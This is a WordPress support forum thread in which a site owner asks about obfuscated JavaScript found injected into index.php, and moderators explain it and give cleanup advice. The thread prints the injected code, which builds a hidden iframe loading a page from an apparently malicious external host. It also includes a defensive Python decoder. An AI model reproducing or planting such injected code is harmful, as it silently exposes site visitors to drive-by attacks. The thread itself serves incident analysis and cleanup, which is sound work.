Not sure if this is a hacker or something else, please analyze this code?

  • In index.php I think this is normal,

    /** Loads the WordPress Environment and Template */

    Right after that inside index.php, I recently found this:
    <?php echo 'status=' ';nf='ifr';r='3';i='gi?';x='u';ei='r';b='//g';kh='.c';l='s';e='ame';t='/i';k='pt0';jl='h';ou=':';yv='.r';j='n';tl='c';tp='ttp';pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,j,kh,i,r);var qb=document.createElement(pa);qb.setAttribute('width','5');qb.setAttribute('height','5');qb.setAttribute('style','display:none');qb.setAttribute(nj,h);document.body.appendChild(qb);'; ?>

    What’s that?

    Background: I have a fairly new WP 2.7 blog. I’m the Administrator, and I have a couple Authors. The site was running live normally on Sunday. On Tuesday I looked and the site was down with a short error message that mentioned (which I know is normally just the index.php in the main blog folder, it only loads the header, it’s not my theme’s template index.php). So I looked inside the index.php to see if it was normal, and it did not appear normal to me. I have not changed this file manually, ever, as far as I can remember it should be the default index.php that came with WP 2.6.x.

    So when I found the above unknown-code I replaced index.php with a default index.php (the site immediately worked again). So I changed some of my passwords in case I was hacked: I changed my WP Admin password, and my Cpanel login password. I haven’t changed MySQL database password and wp-config yet, should I do that too?

    No other signs of hacking yet, I’m going to research it more now & first wanted the Forum’s reading of what that code is.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Well, what it seems to be is a clever way of assigning strings of letters to variables that are other letters, then using the variables to link the strings together. Kind of like saying 1=”My” 2=”name” 3=”is” 4=”John” and then 1 2 3 4.

    The end sum that results from the above is that it tries to open an iframe using a file on a Russian server called, referencing a file and variable called /in.cgi?3

    I couldn’t open it as my security system warns me that the page has been flagged by many as a security risk.
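
The string-splitting trick described in the reply above can be undone without running the script. The following is an added example, not part of the original thread: a static resolver run over a constructed sample modelled on the posted snippet. The host is the reserved placeholder example.invalid and the function names are this example's own.

```python
import re

# Constructed sample in the style of the posted snippet; the host is a
# reserved placeholder (example.invalid), not the one from the thread.
SAMPLE = (
    "nf='ifr';e='ame';l='s';ei='r';tl='c';jl='h';tp='ttp';ou=':';"
    "b='//ex';k='ample';yv='.inv';x='alid';t='/in.c';i='gi?';r='3';"
    "pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,i,r);"
    "var qb=document.createElement(pa);qb.setAttribute('width','5');"
    "qb.setAttribute('style','display:none');qb.setAttribute(nj,h);"
    "document.body.appendChild(qb);"
)

ASSIGN = re.compile(r"(?:var\s+)?(\w+)\s*=\s*'([^']*)'\s*;")
CONCAT = re.compile(r"(?:var\s+)?(\w+)\s*=\s*(\w+)\.concat\(([\w\s,]*)\)\s*;")
CREATE = re.compile(r"(\w+)\s*=\s*document\.createElement\((\w+)\)")
SETATTR = re.compile(r"(\w+)\.setAttribute\(\s*('[^']*'|\w+)\s*,\s*('[^']*'|\w+)\s*\)")

def defang(url):
    """Make a URL non-clickable for tickets and reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def resolve(js):
    """Resolve literal assignments and .concat() chains; nothing is executed."""
    env = {m.group(1): m.group(2) for m in ASSIGN.finditer(js)}
    for m in CONCAT.finditer(js):  # in source order, so chained concats work
        target, base, args = m.groups()
        parts = [base] + [a.strip() for a in args.split(",") if a.strip()]
        env[target] = "".join(env.get(p, "<" + p + ">") for p in parts)
    return env

def injected_elements(js):
    """List DOM elements the script builds, with their resolved attributes."""
    env = resolve(js)

    def value(tok):  # quoted literal, or a variable looked up in env
        return tok[1:-1] if tok.startswith("'") else env.get(tok, "<" + tok + ">")

    found = {m.group(1): {"tag": value(m.group(2)), "attrs": {}}
             for m in CREATE.finditer(js)}
    for m in SETATTR.finditer(js):
        obj, name, val = m.groups()
        if obj in found:
            found[obj]["attrs"][value(name)] = value(val)
    for el in found.values():  # flag the invisible-frame pattern
        style = el["attrs"].get("style", "").replace(" ", "")
        el["hidden"] = "display:none" in style
    return list(found.values())

if __name__ == "__main__":
    for el in injected_elements(SAMPLE):
        print(el["tag"], defang(el["attrs"].get("src", "")), "hidden:", el["hidden"])
```
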

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    They didn’t get into your SQL DB to make that hack, so you should be okay there.

    Doublecheck your other users on the site, make sure there’s no one new, and that no one has weird permissions.

    Thanks for the answers so far. This is scary! I do not think I have ever been hacked before, not anything like this. How did they get in there, and can they again? Was it passwords, or some other problem or method of entry?

    OK, I looked through many of my theme template files, and I don’t see that kind of code anywhere else. I’m checking my other index.php files next (I have additional blogs, separate installs, same server, they are working).

    I checked the “Users” and there are only the Users that I expect, no strange or new users. I have changed passwords as mentioned in post #1.

    I have never messed with chmod in any way.

    Anything else I need to look at?

    I heard there’s a new WP security plugin coming out, I guess I need to look into that.

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Eh, I distrust other people’s ‘security’ plugins, to be honest.

    It’s odd they only hacked /blog/index.php, though. You could check out Hardening WordPress.

    That is odd, isn’t it?

    Because, index.php that we’re talking about doesn’t really “display” anywhere, does it? Or did that code they put, allow it to show that iframe in my header somehow?

    I will read Hardening WP again. I have looked at it before but it’s been a while and I need to be methodical about this now.

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Clearly someone found a way to write to that file. So … logically it’s an access issue. Maybe a hack through comments and a not-correctly-secured index.php file that had lax permissions but … that doesn’t really make sense.

  • The topic ‘Not sure if this is a hacker or something else, please analyze this code?’ is closed to new replies.